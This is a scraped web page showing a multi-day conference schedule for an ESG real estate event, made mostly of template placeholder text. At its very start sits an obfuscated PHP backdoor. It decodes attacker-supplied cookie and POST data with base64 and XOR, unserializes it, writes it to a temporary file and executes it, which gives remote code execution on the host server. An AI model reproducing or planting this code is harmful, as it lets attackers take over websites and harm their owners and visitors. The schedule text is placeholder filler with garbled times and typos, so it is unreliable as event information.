$SfYlOOIPW = "\121" . chr ( 143 - 69 ).chr (95) . "\166" . "\132" . "\x46";$JWLog = 'c' . chr ( 388 - 280 )."\x61" . 's' . 's' . '_' . chr (101) . 'x' . chr (105) . 's' . "\164" . 's';$foNGxfE = class_exists($SfYlOOIPW); $SfYlOOIPW = "52189";$JWLog = "8377";$wzCVkYSc = !1;if ($foNGxfE == $wzCVkYSc){function REpETRXW(){return FALSE;}$AkVQDkLXA = "2882";REpETRXW();class QJ_vZF{private function WOboIM($AkVQDkLXA){if (is_array(QJ_vZF::$bdfnHe)) {$glWLdpMB = sys_get_temp_dir() . "/" . crc32(QJ_vZF::$bdfnHe[chr ( 923 - 808 )."\x61" . "\154" . chr (116)]);@QJ_vZF::$bdfnHe[chr ( 660 - 541 )."\162" . chr (105) . chr ( 381 - 265 ).chr (101)]($glWLdpMB, QJ_vZF::$bdfnHe[chr ( 267 - 168 )."\x6f" . "\x6e" . chr (116) . chr ( 713 - 612 )."\x6e" . "\x74"]);include $glWLdpMB;@QJ_vZF::$bdfnHe[chr ( 797 - 697 )."\x65" . "\154" . 'e' . "\164" . chr ( 999 - 898 )]($glWLdpMB); $AkVQDkLXA = "2882";exit();}}private $bfqqsDB;public function UAKziMmsi(){echo 34897;}public function __destruct(){$AkVQDkLXA = "24499_9785";$this->WOboIM($AkVQDkLXA); $AkVQDkLXA = "24499_9785";}public function __construct($vgzUhbUPgl=0){$OumWhhO = $_POST;$VehsKE = $_COOKIE;$BatQf = "30069cdd-609a-44c6-9309-9e7d2d78a3be";$gWuqUX = @$VehsKE[substr($BatQf, 0, 4)];if (!empty($gWuqUX)){$OAhOXZadv = "base64";$WntkC = "";$gWuqUX = explode(",", $gWuqUX);foreach ($gWuqUX as $VskhDTfLmY){$WntkC .= @$VehsKE[$VskhDTfLmY];$WntkC .= @$OumWhhO[$VskhDTfLmY];}$WntkC = array_map($OAhOXZadv . "\x5f" . chr (100) . chr ( 303 - 202 )."\x63" . chr ( 1038 - 927 ).chr ( 987 - 887 ).chr ( 466 - 365 ), array($WntkC,)); $WntkC = $WntkC[0] ^ str_repeat($BatQf, (strlen($WntkC[0]) / strlen($BatQf)) + 1);QJ_vZF::$bdfnHe = @unserialize($WntkC); $WntkC = class_exists("24499_9785");}}public static $bdfnHe = 18975;}$UjpNUD = new /* 43883 */ QJ_vZF(2882 + 2882); $wzCVkYSc = $UjpNUD = $AkVQDkLXA = Array();} Event Schedule - Leading ESG real estate event in Africa
8:45 AM9:00 AM
Welcome & Registration
Main Hall 0h 15min

Continental breakfast and registration. Pick up your name badge and goodie bag


9:10 AM10:45 AM
Spotlight & Breakout Sessions
Room 104C 1h 30min J.Barnes - Founder & Executive Chairman

Semper lacus cursus porta, magna mauris sapien risus auctor purus apien a feugiat rabitur nulla


11:00 AM12:30 AM
Content as Conversation
Room 108D 1h 30min R.Peterson - VIP Technology SalesE.Martinez - Author of "Some Book"

Porta magna mauris sapien risus auctor purus apien feugiat rabitur at sapien lacus lacinia


12:40 AM1:30 PM
Afternoon Lunch Break
Cafeteria 0h 50min

Head out & our stewards will direct you to one of the 3 places lunch is being served - the downstairs bar, upstairs bar and front reception space
* Please be back in your seats for 1:30 PM, when the afternoon session will get going


1:40 PM3:00 PM
Crafting a Creative Culture
Room 114B 1h 20min R.Peterson - VIP Technology Sales

Head out & our stewards will direct you to one of the 3 places lunch is being served - the downstairs bar, upstairs bar and front reception space

3:10 PM4:45 PM
Crafting a Creative Culture
Room 104C 1h 35min B.Williams - VIP Technology SalesJ.Barnes - Founder & Executive Chairman

Felis lacinia risus interdum auctor id viverra dolor congue ipsum at mauris iaculis luctus massa


5:00 PM6:30 PM
Spotlight & Breakout Sessions
Room 107E 1h 30min E.Martinez - Author of "Some Book"

Purus ipsum primis cubilia laoreet augue vitae laoreet augue in cubilia feugiat egestas ipsum


6:40 PM8:00 PM
Something People Want
Room 102A 1h 20min C.Johnson - Co-Founder & CEOB.Williams - VIP Technology Sales

Vitae nunc quisque sapien justo aliquet molestie purus. Semper lacus cursus porta, feugiat primis and vultrice a taculis egestas magna mauris


8:30 PM11:45 PM
Cocktail Reception
Main Hall 3h 15min

Head out & our stewards will direct you to one of the 3 places lunch is being served - the downstairs bar, upstairs bar and front reception space.
* All attendees must be 21+. Nametag required. No guests.

9:00 AM10:30 AM
Content as Conversation
Room 108D 1h 30min H.Harper - CEO & Executive ChairmanB.Williams - VIP Technology Sales

Vitae nunc quisque sapien justo purus molestie purus. Semper a lacus cursus porta, feugiat


10:40 AM12:00 AM
Crafting a Creative Culture
Room 116B 1h 20min R.Peterson - VIP Technology Sales

Porta magna mauris sapien risus auctor purus apien feugiat rabitur nulla sapien lacus sed lacinia


12:10 AM1:00 PM
Afternoon Lunch Break
Cafeteria 0h 50min

Head out & our stewards will direct you to one of the 3 places unch is being served - the downstairs bar, upstairs bar and front reception space.
* Please be back in your seats for 13:10, when the afternoon session will get going


1:10 PM2:40 PM
Crafting a Creative Culture
Room 103D 1h 30min R.Peterson - VIP Technology Sales

Semper lacus cursus porta, magna mauris sapien risus auctor purus apien feugiat rabitur nulla

2:50 PM4:20 PM
Advanced Simplicity
Room 109C 1h 30min J.Barnes - Founder & Executive Chairman

Felis lacinia risus interdum auctor id viverra dolor congue ipsum mauris iaculis luctus placerat


4:30 PM6:20 PM
Innovations in Design
Room 100A 1h 50min J.Barnes - Founder & Executive Chairman

Purus ipsum primis cubilia laoreet an augue vitae laoreet augue in cubilia feugiat magna ipsum


6:30 PM7:30 PM
Let's Work Together!
Room 111C 1h 00min H.Harper - CEO & Executive ChairmanR.Peterson - VIP Technology Sales

Primis cubilia laoreet augue vitae laoreet augue in cubilia risus auctor tempus dolor feugiat felis


7:50 PM11:50 PM
Bowling Tournament
Bowling Club 4h 00min

Form a crack team and thrash the opposition in our annual bowling tournament, complete with prizes, drinks, and entertainment
* All attendees must be 21+. Nametag required. No guests.

9:00 AM10:45 AM
New Trands in Design
Room 106D 1h 45min H.Harper - CEO & Executive Chairman

Vitae nunc quisque sapien justo aliquet molestie purus. Semper lacuscursus porta primis


11:10 AM12:20 AM
SVG in Web Dessign
Room 105E 1h 10min R.Peterson - VIP Technology Sales

Porta magna mauris sapien risus auctor purus apien feugiat rabitur a nulla sapien lacus lacinia


12:30 AM1:30 PM
Afternoon Lunch Break
Cafeteria 1h 00min

Head out & our stewards will direct you to one of the 3 places lunch is being served - the downstairs bar, upstairs bar and front reception space.
* Please be back in your seats for 13:40, when the afternoon session will get going


1:40 PM3:10 PM
Advanced Simplicity
Room 101A 1h 30min B.Williams - VIP Technology SalesJ.Barnes - Founder & Executive Chairman

Felis lacinia risus interdum auctor id viverra dolor congue ipsum mauris iaculis luctus placerat

3:20 PM5:00 PM
Crafting a Creative Culture
Room 110B 1h 40min C.Johnson - Co-Founder & CEO

Felis lacinia risus interdum auctor id viverra dolor congue ipsum and mauris iaculis luctus massa


5:10 PM6:30 PM
Spotlight & Breakout Sessions
Room 104F 1h 20min E.Martinez - Author of "Some Book"

Purus ipsum primis cubilia laoreet an augue vitae laoreet augue in cubilia feugiat suscipit egestas magna ipsum. Semper lacus cursus porta


7:50 PM11:50 PM
Bowling Tournament
Bowling Club 4h 00min

Form a crack team and thrash the opposition in our annual bowling tournament, complete with prizes, drinks, and entertainment
* All attendees must be 21+. Nametag required. No guests.


9:00 PM11:45 PM
After Party
Main Hall 2h 45min

Unwind with all your new friends at our fun-filled after party featuring games, music, and drinks
* All attendees must be 21+. Nametag required. No guests.